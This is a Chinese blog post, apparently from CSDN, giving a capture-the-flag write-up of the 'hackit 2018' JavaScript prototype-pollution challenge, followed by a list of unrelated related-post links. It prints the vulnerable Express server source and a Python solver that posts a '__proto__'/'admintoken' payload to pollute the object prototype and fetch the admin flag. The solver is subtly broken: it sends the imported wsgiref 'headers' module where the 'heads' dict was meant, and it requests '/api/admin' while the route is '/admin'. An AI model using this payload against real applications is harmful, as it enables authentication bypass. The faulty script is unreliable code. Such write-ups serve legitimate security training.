hackit 2018

最新推荐文章于 2024-08-25 09:57:22 发布
最新推荐文章于 2024-08-25 09:57:22 发布
阅读量157 收藏
点赞数 1
文章标签: javascript 前端 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62903168/article/details/141507941
版权

源代码

const express = require('express')
var hbs = require('hbs');
var bodyParser = require('body-parser');
const md5 = require('md5');
var morganBody = require('morgan-body');
const app = express();
var user = []; //empty for now

var matrix = [];
for (var i = 0; i < 3; i++){
    matrix[i] = [null , null, null];
}

function draw(mat) {
    var count = 0;
    for (var i = 0; i < 3; i++){
        for (var j = 0; j < 3; j++){
            if (matrix[i][j] !== null){
                count += 1;
            }
        }
    }
    return count === 9;
}

app.use(express.static('public'));
app.use(bodyParser.json());
app.set('view engine', 'html');
morganBody(app);
app.engine('html', require('hbs').__express);

app.get('/', (req, res) => {

    for (var i = 0; i < 3; i++){
        matrix[i] = [null , null, null];

    }
    res.render('index');
})


app.get('/admin', (req, res) => { 
    /*this is under development I guess ??*/
    console.log(user.admintoken);
    if(user.admintoken && req.query.querytoken && md5(user.admintoken) === req.query.querytoken){
        res.send('Hey admin your flag is <b>flag{prototype_pollution_is_very_dangerous}</b>');
    } 
    else {
        res.status(403).send('Forbidden');
    }    
}
)


app.post('/api', (req, res) => {
    var client = req.body;
    var winner = null;

    if (client.row > 3 || client.col > 3){
        client.row %= 3;
        client.col %= 3;
    }
    matrix[client.row][client.col] = client.data;
    for(var i = 0; i < 3; i++){
        if (matrix[i][0] === matrix[i][1] && matrix[i][1] === matrix[i][2] ){
            if (matrix[i][0] === 'X') {
                winner = 1;
            }
            else if(matrix[i][0] === 'O') {
                winner = 2;
            }
        }
        if (matrix[0][i] === matrix[1][i] && matrix[1][i] === matrix[2][i]){
            if (matrix[0][i] === 'X') {
                winner = 1;
            }
            else if(matrix[0][i] === 'O') {
                winner = 2;
            }
        }
    }

    if (matrix[0][0] === matrix[1][1] && matrix[1][1] === matrix[2][2] && matrix[0][0] === 'X'){
        winner = 1;
    }
    if (matrix[0][0] === matrix[1][1] && matrix[1][1] === matrix[2][2] && matrix[0][0] === 'O'){
        winner = 2;
    } 

    if (matrix[0][2] === matrix[1][1] && matrix[1][1] === matrix[2][0] && matrix[2][0] === 'X'){
        winner = 1;
    }
    if (matrix[0][2] === matrix[1][1] && matrix[1][1] === matrix[2][0] && matrix[2][0] === 'O'){
        winner = 2;
    }

    if (draw(matrix) && winner === null){
        res.send(JSON.stringify({winner: 0}))
    }
    else if (winner !== null) {
        res.send(JSON.stringify({winner: winner}))
    }
    else {
        res.send(JSON.stringify({winner: -1}))
    }

})
app.listen(3000, () => {
    console.log('app listening on port 3000!')
})

获取flag的条件是 传入的querytoken要和user数组本身的admintoken的MD5值相等,且二者都要存在。

在pycharm下发送post请求测试 

from wsgiref import headers
 
import requests
import json
 
url = "http://192.168.17.1:3000/api"
 
url1 = "http://192.168.17.1:3000/api/admin?querytoken=5881ca97cfe9782358a88e0b31092814"
 
heads = {"Content-type": "application/json"}
 
data = {"row": "__proto__", "col": "admintoken", "data": "oupeng"}
 
res1 = requests.post(url, headers=headers, data=json.dumps(data))
 
res2 = requests.get(url1)
 
print(res2.text)

结果

槐序深巷里打雨伞的人
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【安全】原型链污染 - Hackit2018
故余虽愚,卒获有所闻
08-24 1138
运行一下,然后可以试着访问一下,报错是因为里面没内容而已,不影响,准备工作就做好了。解题关键就在这里,将请求体里面的row,col,data都是我们post传进去的可控的。将这道题所需依赖模块都安装好后。
2018 Multi-University Training Contest hdu 6313 Hack It(构造)
abutoto的博客
07-25 184
题意 改造一组样例,使之复杂度超过n^2,并且不存在一个四个角为1的矩形   题解 神奇的构造,并不懂   代码 #include&lt;bits/stdc++.h&gt; #define N 100005 #define P pair&lt;int,int&gt; using namespace std; typedef long long ll; const int M=1e9...
一道简单的JavaScript原型链污染例题:hackit 2018
banliyaoguai的博客
08-20 763
任何对象都有prototype属性,这个属性就是实例对象的原型对象,然后原型对象上如果添加一个属性,所有实例都会共享这个属性。比如object的tostring方法。这个原型对象的属性绑定在构造函数上,且当实例对象有某个属性或方法就不会再去原型对象找这个方法或属性。然后__proto__可以指向当前对象的原型对象。我们对__proto__赋值就可以修改原型对象的值。
Hack It
weixin_30642267的博客
07-26 185
Hack It Time Limit: 2000/1000 MS (Java/Others)Memory Limit: 32768/32768 K (Java/Others)Total Submission(s): 373Accepted Submission(s): 104Special Judge Problem Description Tonyfang is a cle...
HDU 6313: Hack it
weixin_30947043的博客
07-26 75
Hack It Time Limit: 2000/1000 MS (Java/Others)Memory Limit: 32768/32768 K (Java/Others)Total Submission(s): 548Accepted Submission(s): 170Special Judge Problem Description Tonyfang is a...
2018 Multi-University Training Contest 2 E( Hack It)
snayf的博客
07-26 580
Problem Description Tonyfang is a clever student. The teacher is teaching he and other students "bao'sou". The teacher drew an n*n matrix with zero or one filled in every grid, he wanted to judge if t...
HDU 6313 2018多校第二场hack it
binarycopycode
07-26 154
10000 10000 10000 10000 10000 10000 01000 00100 00010 00001 10000 00100 00001 01000 00010 10000 00010 01000 00001 00100 10000 00001 00010 00100 01000  01000 01000 01000 00100 dls:类似的构造遇到过几次了,orz,听了dls...
2018 Multi-University Training Contest 2 Hack It - HDU 6313
yiyiLy的博客
07-26 233
Hack It Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 32768/32768 K (Java/Others) Total Submission(s): 747    Accepted Submission(s): 247Special Judge   Problem Description Tonyfang is a ...
HackIT-Mobile
05-29
Android 水平分页示例此示例展示了如何使用 Fragments 和 ViewPager 实现选项卡。介绍本示例使用不推荐使用的实现选项卡。 它使用和来处理选项卡之间的滑动并显示选定的选项卡内容。 创建一个扩展的 Activity ,并为...
fb-hack-2018
05-18
该项目是通过引导的。 您将在下面找到一些有关如何执行常见任务的信息。 您可以在找到本指南的最新版本。 目录 自动格式化代码 更改页面<title> 安装依赖项 导入组件 代码分割 添加样式表 ...met
IPv6 Hackit-开源
06-30
IPv6 Hackit 是一个开源工具集,专门设计用于评估和渗透测试IPv6网络。随着互联网的发展,IPv4地址的耗尽使得IPv6逐渐成为网络通信的主流,因此理解和掌握IPv6的安全性至关重要。这个工具集为安全专业人员提供了一种...
d2hackit_v2.0_beta_0920 源代码
08-11
【标题】"d2hackit_v2.0_beta_0920 源代码" 涉及的是一个名为"D2HackIt"的游戏修改工具的第二版测试版的源码,版本号为v2.0 beta 0920。这个工具允许玩家对Diablo II游戏进行自定义和优化,提供了丰富的功能和可能性...
FlyGuys:2018年 华中科技大学 Unique Hackday 亚军作品
05-15
This is Unique Hackday project called FlyGuys powered by Team 8. 文字介绍 背景 游戏是一种娱乐,如今随着AR头盔的盛行,很多游戏开始将玩家带入3D体验。本游戏结合青云服务器,为玩家带来富有现场感的3D飞行...
vue ref和reactive区别
最新发布
灰海
08-25 258
在第二个示例中,我们使用了reactive来创建一个名为state的响应式对象,它包含name和age两个属性。在模板中,我们通过{{ state.name }}和{{ state.age }}来显示state对象的属性值。在第一个示例中,我们使用了ref来创建一个名为count的响应式引用,它是一个简单的数字类型。在模板中,我们通过{{ count }}直接显示count的值,而不需要.value前缀,因为Vue的模板语法会自动处理ref的.value访问。
2024前端面试题-js篇
FormAda的博客
08-22 861
是数组的一种迭代方法,主要用于对数组中的每一项执行给定的函数。它只是简单地对数组进行遍历,没有提供跳出循环的机制。基础数据类型:string,number,boolean,null,undefined,bigInt,symbol。在规定的时间内没有触发事件,就执行函数,如果在规定的时间触发了时间久重新开始计时。当异常被抛出时,正常的流程被打断,可以通过。函数执行一次后,在规定的时间内不再执行。块捕获异常,从而实现停止迭代的效果。执行顺序:同步代码->微任务->宏任务。引用数据类型:Object。
vue开发引入第三方插件的方式及其区别
你们瞎搞
08-22 371
npm。
【js】各类前端输入校验方法
galaxyJING的博客
08-21 363
【代码】【js】各类前端输入校验方法。
Ant-Design-Vue快速上手指南+排坑,操作详细步骤
liyy614的博客
08-23 830
总的来说,掌握Ant-Design-Vue的基本使用并不复杂,但是要想充分利用其提供的功能,就需要深入了解每个组件的详细用法,以及如何合理地整合到你的项目之中。Ant-Design-Vue是一款基于Vue.js的UI组件库,它不仅提供了丰富的高质量组件,还支持灵活的配置选项,使得开发者能够快速构建出既美观又功能强大的前端应用。例如,当你首次注册Ant Design Vue时,需要确保Vue实例已经正确创建并且版本兼容。再如,在按需引入组件的时候,配置正确的webpack策略可以避免不必要的资源请求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值